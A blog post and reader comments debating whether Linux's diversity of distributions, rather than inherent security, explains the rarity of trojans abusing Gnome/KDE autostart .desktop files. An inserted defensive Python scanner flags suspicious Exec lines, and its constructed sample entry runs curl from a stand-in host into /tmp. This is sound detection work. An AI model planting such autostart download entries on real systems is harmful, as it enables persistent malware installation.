On Linux viruses
Some guy from New Zealand blogged about a vulnerability in .desktop files as used by Gnome and KDE, and claims you can write a virus with them for Linux. He actually meant a Trojan rather than a virus, but still.
I'm not saying the vulnerability does not exist. It does, and the trojan he describes should work in theory.
However, in practice, I believe that the real reason why there aren't any Linux viruses is not the fact that Linux is somehow 'safer', but really the fact that Linux isn't a monoculture like Windows is.
If you want to write a Windows virus, you have to deal with, at most, four to five different versions of Windows that are currently still in active use with most users. Target that, and your virus will live like there's no tomorrow.
If you want to write a Linux virus, the range of target systems is much, much larger. In his very blog entry that describes the vulnerability, 'foobar' already describes two special cases he has to consider: the fact that KDE and Gnome write .desktop entries that get executed on startup to different locations, and the fact that, while most distributions ship either curl or wget, none of them has standardized on either of those, requiring the virus writer to account for that, too.
While his blog entry stops at that, there's way, way more he has to deal with. If our supposed trojan writer wants his trojan to proliferate, he will have to deal with distributions that come with or without SELinux; distributions that ship with a /tmp mounted noexec; distributions that ship with Python 2.3, 2.4, 2.5, or 3.0; users who use Thunderbird, Evolution, KMail, mutt, pine, or another mail client; and possibly much, much more (this only describes what's required as described in the referenced blog post). All these differences would make writing some malware that would exploit the described vulnerability tedious, at best, and rather impractical in most cases.
Again, I'm not saying the vulnerability does not exist; it does. But I think this lack of monoculture under Linux, not the (perceived) strength of the platform, is what helps users defend against malware on Linux.
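An added example, not part of the original post or its comments: a defender's check of the autostart .desktop entries mentioned above, flagging Exec lines that call a downloader, run an inline script, or point into a temp directory. The directory list and the heuristics are assumptions, and the sample entry is constructed.

```python
import re
import shlex
from pathlib import Path

# Assumed, not from the post: XDG and legacy KDE autostart dirs, and the name heuristics.
AUTOSTART_DIRS = ["~/.config/autostart", "/etc/xdg/autostart", "~/.kde/Autostart"]
DOWNLOADERS = {"curl", "wget", "GET", "lwp-download"}
INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}
# Constructed sample entry, used only to show what gets flagged.
SAMPLE = '[Desktop Entry]\nType=Application\nExec=sh -c "curl -s http://example.invalid/x -o /tmp/x"\n'

def exec_line(desktop_text):
    """Return the Exec= value from the [Desktop Entry] group, or None."""
    group = None
    for raw in desktop_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
        elif group == "Desktop Entry" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip() == "Exec":
                return value.strip()
    return None

def findings(desktop_text):
    """Return heuristic flags for one .desktop file's Exec line."""
    cmd = exec_line(desktop_text)
    if cmd is None:
        return []
    try:
        words = shlex.split(cmd)
    except ValueError:  # e.g. unbalanced quotes
        return ["unparsable"]
    # Split quoted arguments again so programs inside `sh -c "..."` are seen.
    names = {p.rsplit("/", 1)[-1] for w in words for p in re.split(r"[\s;|&()]+", w)}
    flags = []
    if names & DOWNLOADERS:
        flags.append("downloader")
    if words and words[0].rsplit("/", 1)[-1] in INTERPRETERS and {"-c", "-e"} & set(words[1:]):
        flags.append("inline-script")
    if re.search(r"/(tmp|dev/shm)/", cmd):
        flags.append("temp-path")
    return flags

def scan(dirs=AUTOSTART_DIRS):
    """Map each flagged autostart file to its flags; missing directories yield nothing."""
    files = (p for d in dirs for p in sorted(Path(d).expanduser().glob("*.desktop")))
    hits = ((str(p), findings(p.read_text(errors="replace"))) for p in files)
    return {name: flags for name, flags in hits if flags}
```

Calling `scan()` returns a dict of flagged files; a hit is a prompt to read the entry, not proof of malware.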
So, my train of thought went like this:
These same problems make shipping binary software hard in general, not just for viruses.
We don't care, because people shouldn't ship binaries, they should ship source code and let distributions compile it.
Wait, couldn't a virus just ship C source code and assume GCC? Many distributions come with a compiler by default.
/bin/sh is available on 99.9% of Linux systems. /usr/bin/perl is available on 100% (Essential=yes). libwww-perl's popcon is 63% of installed systems and it is a dependency of Gnome. Also, it is installed on 97% of Ubuntu popcon. Linux isn't a monoculture, but it does rely on lots of standards (POSIX, LSB, freedesktop...)
Implementing a fallback mechanism for wget->curl->GET is trivial.
=> Pretending that [Linux|Mac|Windows|FoobarOS] don't need protection against malware is like saying that one doesn't need shoes: no matter how carefully you are walking, some day you'll walk on a pin, or a scorpion will sting you. (And worse, one may not notice it).
So far so good